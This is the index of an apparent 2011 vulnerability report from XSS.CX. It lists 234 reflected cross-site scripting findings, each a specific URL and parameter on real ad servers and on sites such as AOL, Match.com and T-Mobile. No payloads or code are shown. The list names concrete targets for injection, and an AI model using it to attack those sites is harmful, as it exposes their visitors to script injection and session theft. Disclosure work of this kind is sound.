XSS, DORK, March 22, 2011 Report, Example, PoC's, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Thu Mar 24 06:46:39 CDT 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler

Loading

1. Cross-site scripting (reflected)

1.1. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.8 [adurl parameter]

1.2. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.8 [ai parameter]

1.3. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.8 [client parameter]

1.4. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.8 [num parameter]

1.5. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.8 [sig parameter]

1.6. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.8 [sz parameter]

1.7. http://ad.doubleclick.net/adi/N5956.Google/B3941858.34 [adurl parameter]

1.8. http://ad.doubleclick.net/adi/N5956.Google/B3941858.34 [ai parameter]

1.9. http://ad.doubleclick.net/adi/N5956.Google/B3941858.34 [client parameter]

1.10. http://ad.doubleclick.net/adi/N5956.Google/B3941858.34 [num parameter]

1.11. http://ad.doubleclick.net/adi/N5956.Google/B3941858.34 [sig parameter]

1.12. http://ad.doubleclick.net/adi/N5956.Google/B3941858.34 [sz parameter]

1.13. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [AdID parameter]

1.14. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [FlightID parameter]

1.15. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [Redirect parameter]

1.16. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [Segments parameter]

1.17. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [TargetID parameter]

1.18. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [Values parameter]

1.19. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [sz parameter]

1.20. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [AdID parameter]

1.21. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [FlightID parameter]

1.22. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [Redirect parameter]

1.23. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [Segments parameter]

1.24. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [TargetID parameter]

1.25. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [Values parameter]

1.26. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [sz parameter]

1.27. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [&PID parameter]

1.28. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [&PID parameter]

1.29. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [AN parameter]

1.30. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [AN parameter]

1.31. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [ASID parameter]

1.32. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [ASID parameter]

1.33. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [PG parameter]

1.34. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [PG parameter]

1.35. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [TargetID parameter]

1.36. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [TargetID parameter]

1.37. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [UIT parameter]

1.38. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [UIT parameter]

1.39. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [destination parameter]

1.40. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [destination parameter]

1.41. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [sz parameter]

1.42. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [sz parameter]

1.43. http://ad.turn.com/server/pixel.htm [fpid parameter]

1.44. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26tile%3D1300909197303_@26page.allowcompete%3Dyes_@26domId%3D70810?click parameter]

1.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [AdID parameter]

1.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [FlightID parameter]

1.47. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [Redirect parameter]

1.48. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [Segments parameter]

1.49. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [TargetID parameter]

1.50. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [Values parameter]

1.51. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [name of an arbitrarily supplied request parameter]

1.52. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [AdID parameter]

1.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [AdID parameter]

1.54. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [FlightID parameter]

1.55. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [FlightID parameter]

1.56. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [REST URL parameter 2]

1.57. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [REST URL parameter 2]

1.58. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [REST URL parameter 3]

1.59. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [REST URL parameter 3]

1.60. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [Redirect parameter]

1.61. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [Redirect parameter]

1.62. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [Segments parameter]

1.63. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [Segments parameter]

1.64. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [TargetID parameter]

1.65. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [TargetID parameter]

1.66. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [Values parameter]

1.67. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [Values parameter]

1.68. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [click parameter]

1.69. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [click parameter]

1.70. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [name of an arbitrarily supplied request parameter]

1.71. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [name of an arbitrarily supplied request parameter]

1.72. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D306x25_spon_@26cnn_money_rollup%3Dhomepage_@26cnn_money_section%3Dlast_five_quotes_@26params.styles%3Dfs_@26tile%3D1300909177539_@26page.allowcompete%3Dyes_@26domId%3D80976?click parameter]

1.73. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [AdID parameter]

1.74. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [FlightID parameter]

1.75. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [Redirect parameter]

1.76. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [Segments parameter]

1.77. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [TargetID parameter]

1.78. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [Values parameter]

1.79. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [name of an arbitrarily supplied request parameter]

1.80. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [AdID parameter]

1.81. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [AdID parameter]

1.82. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [FlightID parameter]

1.83. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [FlightID parameter]

1.84. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [REST URL parameter 2]

1.85. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [REST URL parameter 2]

1.86. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [REST URL parameter 3]

1.87. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [REST URL parameter 3]

1.88. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [Redirect parameter]

1.89. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [Redirect parameter]

1.90. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [Segments parameter]

1.91. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [Segments parameter]

1.92. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [TargetID parameter]

1.93. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [TargetID parameter]

1.94. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [Values parameter]

1.95. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [Values parameter]

1.96. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [click parameter]

1.97. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [click parameter]

1.98. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [name of an arbitrarily supplied request parameter]

1.99. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [name of an arbitrarily supplied request parameter]

1.100. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [REST URL parameter 2]

1.101. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [REST URL parameter 2]

1.102. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [REST URL parameter 3]

1.103. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [REST URL parameter 3]

1.104. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [click parameter]

1.105. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [click parameter]

1.106. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [name of an arbitrarily supplied request parameter]

1.107. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [name of an arbitrarily supplied request parameter]

1.108. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1300827954** [10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click parameter]

1.109. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1300827954** [name of an arbitrarily supplied request parameter]

1.110. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [REST URL parameter 2]

1.111. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [REST URL parameter 2]

1.112. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [REST URL parameter 3]

1.113. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [REST URL parameter 3]

1.114. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [click parameter]

1.115. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [click parameter]

1.116. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [name of an arbitrarily supplied request parameter]

1.117. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [name of an arbitrarily supplied request parameter]

1.118. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [ybt parameter]

1.119. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [yhdata parameter]

1.120. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [yyob parameter]

1.121. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [zip parameter]

1.122. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [REST URL parameter 2]

1.123. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [REST URL parameter 2]

1.124. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [REST URL parameter 3]

1.125. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [REST URL parameter 3]

1.126. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [click parameter]

1.127. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [click parameter]

1.128. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [name of an arbitrarily supplied request parameter]

1.129. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [name of an arbitrarily supplied request parameter]

1.130. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [ybt parameter]

1.131. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [yhdata parameter]

1.132. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [yyob parameter]

1.133. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [zip parameter]

1.134. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [REST URL parameter 2]

1.135. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [REST URL parameter 2]

1.136. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [REST URL parameter 3]

1.137. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [REST URL parameter 3]

1.138. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [click parameter]

1.139. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [click parameter]

1.140. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [name of an arbitrarily supplied request parameter]

1.141. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [name of an arbitrarily supplied request parameter]

1.142. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [ybt parameter]

1.143. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [yhdata parameter]

1.144. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [yyob parameter]

1.145. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [zip parameter]

1.146. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [REST URL parameter 2]

1.147. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [REST URL parameter 2]

1.148. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [REST URL parameter 3]

1.149. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [REST URL parameter 3]

1.150. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [click parameter]

1.151. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [click parameter]

1.152. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [name of an arbitrarily supplied request parameter]

1.153. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [name of an arbitrarily supplied request parameter]

1.154. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [ybt parameter]

1.155. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [yhdata parameter]

1.156. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [yyob parameter]

1.157. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [zip parameter]

1.158. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [REST URL parameter 2]

1.159. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [REST URL parameter 2]

1.160. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [REST URL parameter 3]

1.161. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [REST URL parameter 3]

1.162. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [click parameter]

1.163. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [click parameter]

1.164. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [name of an arbitrarily supplied request parameter]

1.165. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [name of an arbitrarily supplied request parameter]

1.166. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [ybt parameter]

1.167. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [yhdata parameter]

1.168. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [yyob parameter]

1.169. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [zip parameter]

1.170. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828217** [&click parameter]

1.171. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828217** [name of an arbitrarily supplied request parameter]

1.172. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828242** [&click parameter]

1.173. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828242** [name of an arbitrarily supplied request parameter]

1.174. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828246** [&click parameter]

1.175. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828246** [name of an arbitrarily supplied request parameter]

1.176. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828252** [&click parameter]

1.177. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828252** [name of an arbitrarily supplied request parameter]

1.178. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

1.179. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

1.180. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

1.181. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

1.182. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

1.183. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

1.184. http://api.bizographics.com/v1/profile.json [&callback parameter]

1.185. http://api.bizographics.com/v1/profile.json [api_key parameter]

1.186. http://api.screenname.aol.com/auth/getToken [c parameter]

1.187. http://b.scorecardresearch.com/beacon.js [c1 parameter]

1.188. http://b.scorecardresearch.com/beacon.js [c15 parameter]

1.189. http://b.scorecardresearch.com/beacon.js [c2 parameter]

1.190. http://b.scorecardresearch.com/beacon.js [c3 parameter]

1.191. http://b.scorecardresearch.com/beacon.js [c4 parameter]

1.192. http://b.scorecardresearch.com/beacon.js [c5 parameter]

1.193. http://b.scorecardresearch.com/beacon.js [c6 parameter]

1.194. http://c.aol.com/read/_share_counts [callback parameter]

1.195. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

1.196. http://cim.meebo.com/cmd/drads [impression parameter]

1.197. http://core.insightexpressai.com/adServer/GetInvite2.aspx [esi parameter]

1.198. http://core.insightexpressai.com/adServer/GetInvite2.aspx [name of an arbitrarily supplied request parameter]

1.199. http://core.insightexpressai.com/adServer/GetInvite2.aspx [referer parameter]

1.200. http://ds.addthis.com/red/psi/sites/www.sailingworld.com/p.json [callback parameter]

1.201. http://g2.gumgum.com/services/get [callback parameter]

1.202. http://i.microsoft.com/en-us/homepage/bimapping.js [v parameter]

1.203. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]

1.204. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

1.205. http://imp.fetchback.com/serve/fb/adtag.js [tid parameter]

1.206. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

1.207. http://js.revsci.net/gateway/gw.js [csid parameter]

1.208. http://mbox12e.offermatica.com/m2/tmobile/mbox/standard [mbox parameter]

1.209. http://media.match.com/iframe [@CPSC@ parameter]

1.210. http://media.match.com/iframe [name of an arbitrarily supplied request parameter]

1.211. http://media.match.com/iframe [target parameter]

1.212. http://metaframe.digitalsmiths.tv/v1/tmzcompany/playlists/mostrecent [REST URL parameter 1]

1.213. http://metaframe.digitalsmiths.tv/v1/tmzcompany/playlists/mostrecent [REST URL parameter 2]

1.214. http://metaframe.digitalsmiths.tv/v1/tmzcompany/playlists/mostrecent [format parameter]

1.215. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

1.216. http://publisher.mediapass.com/AffiliateID.aspx [Name parameter]

1.217. http://r.turn.com/server/pixel.htm [fpid parameter]

1.218. http://r.turn.com/server/pixel.htm [sp parameter]

1.219. https://secure.coolhandle.com/cart.php [domainoption parameter]

1.220. https://secure.coolhandle.com/other/contactform_orderform.php [name of an arbitrarily supplied request parameter]

1.221. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

1.222. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

1.223. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

1.224. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

1.225. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

1.226. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

1.227. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

1.228. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

1.229. http://web.lightningcast.net/servlets/getPlaylist [uid parameter]

1.230. http://www.aolnews.com/category/nation/ [REST URL parameter 2]

1.231. http://www.match.com/search/searchSubmit.aspx [name of an arbitrarily supplied request parameter]

1.232. http://www.t-mobile.com//htmlservices/navigation/TMobileNavigation.ashx [currentURL parameter]

1.233. http://www.t-mobile.com/Company/Community.aspx [name of an arbitrarily supplied request parameter]

1.234. http://www.t-mobile.com/Company/PrivacyResources.aspx [name of an arbitrarily supplied request parameter]

